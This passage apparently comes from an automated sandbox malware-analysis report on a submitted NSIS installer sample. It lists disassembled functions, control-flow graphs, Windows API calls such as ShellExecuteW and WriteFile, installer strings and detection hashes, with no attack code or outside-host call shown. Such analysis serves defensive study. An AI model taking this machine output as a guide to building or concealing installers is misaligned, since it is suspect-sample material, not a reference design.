                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                                            • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                                            • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                                                            Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00425D19,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: (]C$... %d%%$pAB
                                                                                                                                                                                                                                                                                                                            • API String ID: 651206458-3635341587
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                                                            Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                                                            Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(0065C410), ref: 00402387
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$ReturningPreferencesWrightWhy
                                                                                                                                                                                                                                                                                                                            • API String ID: 1459762280-616307493
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                                            Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(0065C410), ref: 00402387
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                                            Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                                            Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                                            • String ID: <RM>$ReturningPreferencesWrightWhy$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                                            • API String ID: 247603264-1512163661
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                                            Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
